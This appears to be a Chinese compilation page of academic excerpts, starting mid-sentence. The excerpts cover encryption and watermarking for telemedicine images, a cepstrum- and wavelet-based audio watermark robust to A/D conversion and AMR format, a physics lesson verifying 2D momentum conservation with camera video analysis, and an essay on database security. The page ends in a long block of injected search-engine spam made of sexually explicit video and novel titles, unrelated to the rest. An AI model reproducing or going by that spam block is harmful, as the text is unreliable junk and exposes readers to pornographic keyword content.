字圖像水印技術[3],能夠有效地保護作者以及出版商的合法權益不受侵犯,現已被廣泛應用于印刷領域中,具有了廣闊的使用價值和商用價值,成為多媒體及知識產權保護的有效手段之一。數字圖像水印技術是信息隱藏技術研究領域的一個重要分支。為了顯示創作者對其作品的所有權,這種隱藏技術將具有某種意義的數字水印利用數字嵌入方法將其隱藏在其作品(可以是多種信息載體,比如視頻、圖像、聲音、文字等數字產品)中。在進行印刷品真偽驗證時,可通過水印的檢測、分析來保證數字信息的完整性及可靠性。數字圖像分存數字圖像分存技術是把一幅需要進行保護的數字圖像分割成多幅圖像進行傳輸。被分割后的圖像不再具有某種特殊的意義成為無意義或是看起來雜亂無章的圖像。也可將分割后圖像進一步隱藏到另外幾幅不相關的或是具有一定迷惑作用的圖像中進行存儲獲傳輸。這類似于數據組的分包傳輸。這樣可以避免因個別圖像的傳輸丟失而造成病人隱私信息遭到泄露的危險,而且也起到在通信中個別被分割后的圖像信息的丟失與泄露不會影響原始圖像信息的泄露。數字圖像分存技術的特點使竊密者竊取完整的原始圖像的成本大大增加,而且也提高了病人圖像隱私的保密程度同時,若將圖像置亂技術、圖像隱藏技術、圖像分存技術三者結合起來將使圖像的安全傳輸有了較高的可靠性。

對病人實行連續診斷,及時獲取病情發展狀況成為未來要實現的目標;同時,病人的隱私在圖像傳輸過程中也增加了泄露和被攻擊的風險,因此,在某種特定情況下對病人圖像信息的傳輸需要進行加密保護。實現這一目標的關鍵技術就是安全性高、保密性強、延時短的圖像加密通信系統。圖像加密通信系統對病人的病情進行實時監護,并將病人的信息實時傳回到醫生的監控中心,使醫生能夠通過監控屏幕實時查看了解病人的具體情況,以能夠及時做出正確的醫療診斷。目前數字圖像的特點決定了其在存儲傳輸時必定要占用較大的空間與帶寬,再加上其需要處理的信息量大,這就進一步給圖像的加密和通信帶來了困難。而遠程醫療更需要清楚的觀測到病人的詳細病情,就進一步加大了保密通信的難度。因此需要將圖像壓縮以及圖像加密兩個技術結合起來對數字圖像的傳輸進行處理。圖像加密是為了保證數字圖像的安全,圖像的壓縮技術可以最大限度的減小占用的存儲空間以便降低傳輸數據量。根據對原始圖像進行壓縮及加密處理過程不同,可將現有的數字圖像加密通信分為三類。圖像直接加密將數字圖像直接加密一般是通過數字圖像置亂技術直接對需要加密的數字圖像進行置亂,隨后再進行壓縮編碼和通信傳輸。這個方面的研究較早,相關論文也最多。例如,基于混沌的數據塊加密算法將圖像或視頻數據先進行位置置亂,再進行像素值擴散,此算法具有較高的密鑰敏感性和明文敏感性,使得加密后的數據具有均勻隨機分布的特點。但是,這類方案只看重了圖像的加密,沒有將圖像的壓縮編碼問題放在同樣重要的位置上考慮。這樣就隨之而然的出現了兩個嚴重影響通信效率及解密后的圖像清晰度的問題。一是,需要加密的原始視頻圖像本身的數據占用空間就大,其進一步的加密計算便會消耗大量的資源與時間,這與實時性的要求有悖,況且目前的設備處理能力有限更難以達到圖像傳輸的實時性要求,加重了通信的負擔;二是,由于經過加密算法處理,使圖像原來的相鄰像素間的相關性有了變化,大量的增加了高頻分量。使加密壓縮后的視頻圖像的高頻分量比低頻分量的失真大得多,因此解密后的圖像會有較大的失真。

首先通過現有的壓縮算法對視頻、圖像進行壓縮,之后再對壓縮后的數據加密。加密的算法可更具需要采用安全性不同的算法。此方案的優點是具有較高的安全性;缺點是由于加密是在壓縮后的數字圖像數據上進行,便不再區分數據的重要性,因此數據加密的效果差、效率低而且數據也量大,使運算的設備負擔也加重。選擇性加選擇性加密是在方案特點的基礎上改進,在選擇采用一定的壓縮標準將視頻圖像壓縮后,再對重要的數據進行著重加密。兼顧了數據的安全與傳輸的效率。目前,視頻圖像編碼標準根據靜態圖像和動態圖像來分主要分為靜態圖像的壓縮標準和運動圖像的壓縮標準兩種。動態圖像的壓縮標準主要有MPEG-1,MPEG-2,MPEG-4,H.263和H.264;靜態圖像的壓縮標準主要有JPEG、JPEG2000。文獻[4]采用小波置亂的方法來實現對JPEG2000的小波系數的實時加密。針對MPEG-2標準,文獻[5]提出了對I幀加密的思路。針對H.264具有代表性的研究成果有Ahn提出的幀內預測模式加擾方法,該方法將所有I、P幀中的INTRA-4x4塊和INTR_16×16塊預測模式使用定長偽隨機序列進行隨機加擾,方法效率高但安全性較差。文獻[6]提出了對熵編碼過程進行加密的思路,但這種方案的實現比較復雜。

作者:李穎姝 李瑩 單位:青島市第五人民醫院 青島市電子政務與信息資源管理辦公室

篇(9)

論文關鍵詞:音頻水印;小波變換;倒譜;模/數轉換;amr格式

0引言

在電視廣播、交通臺和音樂會等公共信息傳播領域,音頻的版權管理和安全傳輸都非常重要。如果采用數字水印技術,則需要水印算法能夠抵抗a/d和d/a轉換。目前,具有這種變換的類型可以劃分為三種。第種是基于電纜傳輸方式,以電話線傳播和直通電纜連接為典型,所受干擾小。電話線方式是公用信道,能夠傳播很遠,傳輸秘密水印的載體可以是話音或音樂等類型;而直通電纜方式一般在一個辦公實驗的局部環境中。第二種是基于廣播方式,通過廣播媒體或專用頻道進行傳播。第三種是基于空氣直接傳播方式,會遭遇各種干擾,通常只能近距離設計。由于音頻水印的遠程傳輸和提取具有廣泛的應用價值,這些音頻傳播水印技術在國外已經受到了極大重視并有所成果。在空氣傳播水印信息方面,德國的steinebach等人…開展了最早的研究,通過設定5—4oocm的多個不同間距,同時使用了4種不同的麥克風,研究了5種音頻類型的水印技術,在5~180cm的間距普遍獲得了良好的提取效果。隨后,日本的achibana等人口研究將水印實時地隱藏到公共環境如音樂演奏會的音樂之中,能夠成功地在一個30s音樂片段內隱藏64b的消息,測試的空氣傳播距離為3m。在電話網絡傳播方面,加拿大的chen等人開展了模擬電話通道的隱藏,在誤碼率小于0.001時,其數據帶寬達到了265bps。日本的modegi等人設計了一套非接觸水印提取方案,通過手機來廣播或轉存水印音頻,然后,通過計算機將秘密從轉存的音頻文件提取出來。隱藏帶寬達到61.5bps,提取率高于90%。但是,這幾種研究結果并沒有對算法做詳細描述。在直通電纜傳播方面,項世軍等人采用了三段能量比值方法,嵌人的是一串32b信息,雖然提取效果比較好,但由于實驗容量太小,實用性不夠,且對同步技術有較高的要求;王讓定等人采用改進的量化方法、馬冀平等人”采用了dct方法,嵌入的都是小圖片,但提取效果一般,僅可辨認。雷贄等人在短波廣播含水印音頻算法方面取得了可喜的進展,通過多種同步方案和算法設計,使水印提取的模擬和實測過程都達到了較好的效果,但實驗容量很小。此外,由守杰等人設計了一種相似度計算方法,由于是非盲提取,不適于廣播通信領域。作者利用小分段的直方圖特性,開展了抗a/d轉換的音頻水印初步研究,在每段開頭總能獲得正確提取,但在每段的后續隱藏效果不佳,還需要做許多改進。

可見,在面向公共音頻傳播方面,如何既能提高隱藏效果又能增大容量,仍然是音頻水印算法要解決的一個難題。本文通過數據特性分析,采用倒譜技術和小波分解方法,成功地解決了問題,且能夠抵抗一定的手機彩鈴amr攻擊,為實用化提供了重要基礎。

1數據特性描述

音頻信號經過具有a/d和d/a轉換的傳輸過程時,必然要涉及到以下問題:

1)音頻信號要經歷傳輸過程中的外加干擾,包括50hz的工頻電信號,因此,需要選擇大于50hz的音頻頻率信號;

2)因聲卡特性不同,音頻轉換過程不一定具有線性模型;

3)傳輸中錄制的音量往往與播放的音量不一致,這要求水印算法能夠抵抗音量的大范圍變化;

4)傳輸中錄制開始時刻可能早于也可能晚于播放時刻而且結束時刻也不一定一致,所以水印隱藏的起始位置需要沒置標志;

5)轉換過程具有一定的濾波特點,可濾除較高頻率信號。

1.1音頻頻率范圍選擇

對照音頻頻率響應特性圖可以發現,在低頻部分的閾值比2khz~4khz的要高得多,不容易察覺;尤其是1khz以下部分,其不可感知性要好得多。文獻[4]的實驗也表明,音頻數據通過a/d和d/a轉換后,其低頻范圍700hz以下的損失非常小。可見,選擇在頻率為(50,700)范圍內的音頻數據,用于信息隱藏非常有利。

1.2倒譜系數的選取方法

倒譜變換在音頻水印中已經具有了較強的健壯性,能夠抵抗噪聲、重采樣、低通濾波、重量化和音頻格式轉換等常見攻擊。倒譜變換后的數據特征表現為:倒譜系數在中間部分的差異很小,而在兩端的變化很大。

圖1是對音頻進行7級小波分解后,選取5~7級高頻數據部分進行倒譜變換情形。在進行統計處理時,如果讓全部數據參與,則計算結果在隱藏前后有明顯變化;如果不考慮兩側若干個大數據,僅以中間大部分數據參與運算,則計算結果容易保持在一個穩定范圍內。

進一步,如果將計算的均值移除,即相當于此時的均值為0。然后,在0的上下兩邊產生一個偏差,如2,以分別隱藏比特信息“1”和“0”。則在提取時,只需要判斷所求均值是否大于0,就可以求得水印比特。這種方法,稱之為“數據分離調整”技術。

2算法分析與設計 

2.1隱藏算法流程設計

將原始音頻分段時,段數至少是水印比特數。然后,對每段數據進行小波分解,取其低頻系數進行倒譜變換,采用前述的數據分離調整技術,以實現水印比特嵌入。之后,先后重組倒譜系數和小波系數,獲得含有水印信息的音頻段,從而構造為新的音頻。該算法流程如圖2所示。

為了增強可靠性,對水印信息先做糾錯處理,采用bch編碼方法。算法的主要工作是尋找合理的參數優化配置,使隱藏效果達到最優。參數主要有:小波分解級數、分段的數據幀長度、數據幀的間距、上下分離的閾值將數據幀的間距設置為數據幀長度的倍數,最大為1,最小為0。期間選擇多個系數,結果發現都可以成功實現隱藏。

2.2水印嵌入算法設計

1)水印信息處理。

音頻載體分段數至少應該大于,才能滿足隱藏要求。

假設每段長為,該段經過小波變換的級分解后,各級小波系數長度分別為:

取低頻系數部分,使之頻率范圍位于(50,l000)內,則需要構造一個組合的低頻小波系數集合。以8khz音頻為例,實施7級小波分解后,所選擇的低頻系數部分為:

p的長度非常重要。如果太小了,對隱藏不利;反之,就需要更長的音頻載體。所以,音頻分段與小波分解具有密切的關系。

3)倒譜變換。

復倒譜變換對于信號序列的均值大于或等于0時,其逆變換可逆;否則不可逆。為此,需要計算指定段信號的均值,若均值小于0則取反。然后對所有指定段進行復倒譜變換。

4)倒譜系數的選取。

去掉首尾波動很大的部分,而選擇中間平穩的部分嵌入水印。假設兩端各去掉l0個數據,則實際用于隱藏水印的倒譜系數長度為:

5)去均值化處理。

計算剩余部分的均值,然后用每一個倒譜系數減去該均值,得到倒譜系數的相對值。 

6)嵌入水印。

給定一個閾值t,采用整體上下拉開的思路,對以上的相對倒譜系數進行修改,得到最終的倒譜系數,從而實現水印的嵌入。

7)重構音頻信號。

對嵌入水印的段重構后,實施復倒譜反變換。然后進行小波重構,從而得到含有水印比特的音頻段。將所有這些段重構,就獲得了含全部水印信息的音頻。

2.3水印提取

水印提取過程的前半部分與嵌入過程是一樣。在提取出比特序列后,再經過bch解碼處理,從而得到隱藏的水印比特序列。水印提取的流程如圖3所示。

對獲得的倒譜系數去兩側數據,計算剩下的倒譜系數平均值。按照以下規則進行隱藏信息的提取:

在信息傳播方面.針對a/d和d/a傳播采用『_直通電纜的傳輸方式,在單機上用電纜將音頻輸入輸出口相連。傳輸線為音頻線1.8m和延長線1.8m,共3.6m。此外,針對手機彩鈴傳播采用了amr方式。隱藏水印設計了三種方案,如圖4所示。

小容量的便于amr處理,大容量的便于實用化。

仿真工具為matlab7.2.使用windowsmediapldrver播放器播放音頻載體,使用cooledit pro工具進行錄音、編輯和攻擊處理。

基本參數選擇為:選用harr小波進行7級小波分解后,按照式(4)選取低頻系數區域,所得頻段在77.5~5o0hz范圍。式(7)中的為l0,式(9)中t值的合適范圍在0.005~0.025中實驗選取。式(3)中的取值為3200非常合適,此時,實際參與計算均值的數據為155。

3.2音頻載體的影響

音頻載體選擇了三種,如表1所示,  

其采樣頻率8khz,樣本精度為16b,單聲道,段的長度為3200。音頻轉換為8khz的目的是為了今后在電話網上的隱蔽傳輸,并可以轉化為amr文件,傳輸到手機中,成為手機彩鈴的版權管理目的。

經過a/d和d/a傳播后,4×4水印提取的誤碼情況如表1所示。可見,載體的選用非常重要;同時,從音頻質量上考慮,選用較小的t值更有利于保證信噪比。所以,以下的實驗采用的是“奧運主題歌”。

3.3閾值參數的合理計算

選擇了水印“北”進行比較測試,如圖5所示。結果表明,在t值為0.016時,誤碼率為0,效果最佳。為此,后續實驗也采用該值。

3.4大容量a/d和d/a傳輸

采用圖像水印“北京”進行大容量測試,音頻載體選用“奧運主題歌”。圖6為經過a/d和d/a轉換前后的數據均值計算對比情況.共有bch編碼的555個數據。按照式(10)

提取后,能夠完全正確提取,且誤碼率為0。進一步,將本文算法的實驗效果與已有屬于盲提取的研究結果相比較,如表2所示。

可見,本文算法雖然帶寬小,但水印能夠正確提取,而且嵌入容量較大。由于實驗中使用了8khz的音頻載體,能夠廣泛應用于語音傳輸和手機彩鈴等場合,所以在電話網絡廣播方面的實用性強。

3.5抗amr轉換

隨著手機彩鈴的普遍使用,彩鈴的安全傳播和管理將成為新的問題。本算法在這方面也開展了新的嘗試,將水印隱藏在彩鈴中,可以起到版權保護或秘密信息傳播的作用。

目前手機錄音放音格式多數是amr格式,要求算法能夠抵抗amr轉換攻擊。在上述的音頻載體中成功完成水印嵌入后,需要將采樣精度l6b、采樣頻率為8000的波形音頻轉換為amr格式,就可以存入手機中使用或發送給他人。提取時,先將amr文件轉換為wav格式,然后再提取水印信息。

篇(10)

關鍵詞 視頻分析法;數碼相機;二維動量守恒;拍攝技術;誤差

【中圖分類號】G434 【文獻標識碼】B

【論文編號】1671-7384(2015)01-0073-03

在人教版高中物理選修3-5《動量守恒定律》一章中,教師用滑塊在氣墊導軌上的直線運動演示“驗證動量守恒定律”的實驗,這個實驗研究的是一維碰撞動量守恒,但實際生活中更多的是二維或是三維的斜碰,如臺球的碰撞、保齡球的碰撞、微觀粒子的碰撞和天體的碰撞等[1]。二維或三維運動是大學物理實驗教學中的重要內容[2],在現有的普通物理實驗教學中,一般只涉及兩小球在直線上的碰撞,二維碰撞運動是新內容。

利用視頻分析法探究小球“二維碰撞動量守恒”既有利于學生對動量守恒物理知識的完整理解,又有利于學生掌握利用多媒體技術及基本的數字化研究方法。本論文分別利用 “連拍合成技術”“高速連拍技術”和“攝像技術”三種技術對小球二維碰撞動量守恒進行探究實驗。

實驗準備

1.實驗工具與軟件:CASIO(EX—FH100)數碼相機、計算機、三腳架、光滑的玻璃平面、水平儀、兩個顏色不同大小質量相同的直徑為25mm的小球、Mr.captor頻閃截屏軟件、幾何畫板等。

2.實驗環境與條件:在進行實驗之前要保證平面和相機水平,玻璃面盡量光滑使摩擦力減少到最小。這里我們用到水平儀分別對相機與平面進行校準,如圖1和圖2。

實驗過程

用數碼相機的“連拍合成技術”“高速連拍技術”“攝像技術”結合頻閃截屏軟件與幾何畫板軟件,分別對兩球斜碰過程進行圖形獲取、圖像處理、數據分析。

1.連拍合成技術

(1)圖像獲取

通過相機的BS功能鍵進入到情景模式區,選定“連拍影像合成”,如圖3。

拍攝的時候,相機會以5張/秒的連拍速度捕捉一個連貫的動作。兩個顏色不同、大小質量相同的玻璃球作為研究對象,在光滑平面上,讓綠色小球碰撞藍色小球,拍攝小球的二維碰撞過程,獲得連拍合成圖像,如圖4所示。

(2)圖像處理

①將圖片粘貼到“幾何畫板”中,利用“點工具”將圖片中的綠色小球和藍色小球分別用綠色圓點和藍色圓點表示出來。

②點擊工具欄中的自定義工具項目,選擇圓工具中過三點的圓(虛線),如圖5所示。選擇圖片中圓表面的任意三點,軟件就能將小球圓心標識出來。

③選擇移動箭頭,鼠標移動到圓上點擊鼠標右鍵,會出現如圖6所示的對話框,選擇隱藏圓。圓框消失后,將鼠標移動到圓表面的三個點,點擊右鍵,選擇隱藏點,依次將三點全部隱藏,最終圓心就能確定了。

④ 選中各點點擊“度量”菜單中的“橫坐標”“縱坐標”就可以顯示小球所在位置的坐標值,再點擊“顯示”菜單中的“隱藏照片”。

圖像處理結果如圖7所示。

(3)數據分析

選定各點坐標再點擊“數據”菜單中的“制表”,可以得到橫縱坐標的表格。由于玻璃板光滑,可以認為小球近似做勻速直線運動,速度可以通過得到,其中。經過計算算得在x方向動量誤差為9.7%,在y方向動量誤差為4.9%,平均誤差為7.3%。在誤差允許的范圍內,小球二維碰撞過程的動量守恒得到驗證。

(4)注意事項

此相機的連拍速度是5張/秒,如果物體運動速度太快,相機合成效果不明顯;物體運動速度太慢,畫面重疊,所以在做實驗前要了解相機的連拍速度,以便對小球運動的速度合理控制。

2.高速連拍技術

按連拍(HS)按鈕,如圖8所示,將連拍速度設置為40fps,最多連拍幅數設定為30,預先記錄連拍設置為0.3s。半按快門鈕,進行預先記錄拍攝,等到理想拍攝時機時,完全按下快門鈕,拍攝想要的圖片。兩個顏色不同、大小質量相同的玻璃球作為研究對象,在光滑平面讓綠球碰撞靜止的藍球,連拍小球的二維碰撞過程,然后通過幾何畫板對圖像進行拼接處理。

光滑平面連拍:綠球碰撞靜止的藍球,如圖9所示。

圖像處理與數據分析步驟與連拍合成技術相同,最后算得誤差平均值為3.5%。

3.視頻頻閃截屏技術

在拍攝方式中,將動畫方式旋鈕轉至(HD/STD),選擇高速動畫(HS),按動畫按鈕開始拍攝,分別在光滑平面讓藍球碰撞靜止的綠球和非光滑平面讓藍球與綠球互撞,碰撞完成后,再按動畫按鈕結束拍攝。然后用頻閃截屏軟件Mr.Captor對拍攝的視頻進行頻閃截屏,點擊“選項”菜單中“參數”命令,將彈出參數窗體,在“定時/視頻”中設置頻閃周期為0.1秒,設定圖片保存路徑。點擊“ ”按鈕,在屏幕上圈定單擺振動的截屏區域,再點擊鼠標右鍵,在彈出的菜單中選取“開始定時捕捉”命令,于是所捕捉的圖片被記錄在相應的文件夾中并被自動編號。最后通過幾何畫板對圖像進行拼接處理。在進行圖像處理時,處理好一張圖片之后,隱藏圖片,拖進下一個圖片,逐個處理,這樣每個小球運動的軌跡就能記錄在幾何畫板之中了。經過計算算得平均誤差為26.75%。

三種技術總結與對比

通過對這三種技術進行實驗,總結出每種技術的特點與差異,總結如表1。

根據以上分析,得出此實驗誤差與數碼相機的配置有極大的關系。教師可以根據教學條件以及課程的需要選擇以上方法探究二維碰撞動量守恒問題。

篇(11)

(一)鑒別身份

在應用數據庫時,有一個驗證程序,針對全部用戶,即鑒別使用用戶的身份。在端口計算機和訪問計算機的身份鑒別中要使用身份鑒別。當我們想要使用計算機時,用戶需要連接相應的HTTP和SSH,輸入用戶名和密碼,來鑒別用戶的身份。使用的人需要嚴格保守密碼,同時存留在對應的服務器上。將編程技術運用到計算機數據的使用和建立中,能夠實現企業關聯數據和內部文件的安全管理,以免由于企業信息泄露,給企業造成經濟損失。

(二)可用性

將編程技術運用到數據庫系統中,其可用性十分強。成功解決不均衡的負載和一些數據庫中的故障等問題是對可用性的要求。當計算機的主接口出現了問題,留作備用的接口將會自動替代問題接口進行工作,這樣可以使其他故障不對其產生作用,保證網絡在工作過程中的持續穩定性。另外,接收大量的網絡數據時,主接口就可以在備用接口的幫助下,完成數據的接收和傳輸工作,確保計算機能夠正常運作。

(三)隱藏信息的特性

在進行通訊連接時,由于計算機中NAT技術的作用,內部網絡中的網址會被隱藏,此時顯示在數據中的結果是通過公共網絡網址進行訪問的,這就是編程技術的隱藏性。換句話說,企業的平常管理工作中,用戶可以使用計算機直接訪問外部網絡,然而對企業內部網絡的搜索和查看,這些是外部網絡無法實現的,成功實現了安全管理及保密企業信息。

二、計算機軟件工程的數據庫編程技術

(一)設計、開發編程技術

數據庫正式投入使用后,需要隨時關注系統的運作情況,在系統運行的過程中,盡早發現沒有處理的問題并進行分析。所以,就要折返到編程階段,盡早處理在編程階段沒有處理的問題,完善優化數據存儲系統。與此同時,運用不同的編程技術來應對不同的軟件應用,根據各種軟件應用的不同特性,采取不一樣的編程技術,對軟件運用中有待處理的問題進行分析,保證軟件可以平穩的運作,而且還能夠合理化的運用系統資源,假若一部分數據出現傳輸問題,也能夠運用編程技術將出現問題的部分進行調整。

(二)加密數據庫文件

當今社會,信息化高速發展,在聊天記錄、網絡搜索中都存在大量的個人隱私,人們對個人隱私的重視度也逐漸提高,而計算機數據庫作為專門存儲網絡信息的工具,其保密性能的高低,直接關系到人們生活、工作中的信息安全問題。一方面,要分析數據庫中存儲的基本信息,并加上基本的保護在其中的隱私類消息上,一旦有信息外漏的情況產生,編程師就要及時通過編程的方式處理這個問題,經過編程,加密保護數據庫中的文件。在實行加密保護的同時,還要與計算機軟件工程的現實情況進行結合,從而充分發揮加密保護的作用;另一方面,加密保護的功能還可以進一步更深層次的設計,將加密保護分成幾個層級,以滿足不同用戶的要求,同時每個用戶都可以設置自己的專用登錄密碼,然后系統編程會確認登錄密碼的正確與否,并根據對應的密鑰,實現深層次加密信息;最后,在數據庫編程時,由于信息不同的選擇造成各系統間的沖突,能夠運用系統間的優化體系,優化處理產生的問題。

(三)設計存儲模式

如今的生活中,由于計算機的使用越來越普遍,數據庫技術就要保護更多的網絡信息數據。一方面,軟件系統的設計要以軟件功能系統的選取為重點,也可以將其他工程項目設計過程中的理念運用其中,優化設計方案,從而使設計出的數據庫能夠更加穩定的運行;另一方面,在數據庫進行實際存儲時,可以將各類信息進行分類存儲,方便人們二次使用數據。最后,將優化的數據系統運用到數據庫存儲模式中,在數據庫開始使用后,可以將產生的問題盡早優化,同時還能夠將沒有解決的問題盡早發現,以使數據庫的存儲更加方便用戶使用。

三、結語

由此可見,將數據庫編程技術分析工作做好,意義十分重大。這對于計算機數據庫實際應用的提高十分有利,可以擴大編程技術的運用優勢,在國家信息化發展方面,提供更多的技術方面支持。所以,基于計算機軟件工程的數據庫編程技術在今后的計算機研究工作中應予以更多的重視,并科學的評測此類技術的實際運用效果,用以增加適用范圍,使其在國家經濟社會的發展中發揮作用。

軟件工程碩士論文參考文獻:

[1]張學立,田林琳.基于計算機軟件工程的數據庫編程技術淺談[J].時代農機,2018,45(11):163.

主站蜘蛛池模板: 天天躁日日躁狠狠躁一区| 日韩经典欧美一区二区三区| 午夜精品成人毛片| 阿娇被躁120分钟视频| 国产精品va在线观看无码| 99久久精品日本一区二区免费 | 在线日韩日本国产亚洲| 三个馊子伦着玩小说冫夏妙晴| 日本在线色视频| 久草免费在线观看视频| 欧美人与动性xxxxx杂性| 亚洲熟妇av一区二区三区宅男| 男女同房猛烈无遮挡动态图| 午夜高清在线观看| 色天使久久综合网天天| 国产又大又粗又猛又爽的视频| 色综合67194| 国产精品久久久久久福利| 4jzbtv四季彩app下载| 国内一级特黄女人精品毛片| a级**毛片看久久| 娇小xxxxx性开放| 一级大黄美女免费播放| 成人黄页网站免费观看大全| 久久久99精品成人片| 日本肉体裸交xxxxbbbb| 久久精品夜夜夜夜夜久久| 最近高清日本免费| 亚洲一成人毛片| 欧美人善交videosg| 亚洲国产精品成人综合久久久| 欧美精品一区二区久久| 亚洲精品乱码久久久久久| 深夜特黄a级毛片免费播放| 伊人成影院九九| 狠狠噜狠狠狠狠丁香五月| 免费国产a国产片高清网站| 粗大的内捧猛烈进出视频一| 冲田杏梨在线中文字幕全集| 精品性高朝久久久久久久| 午夜久久久久久|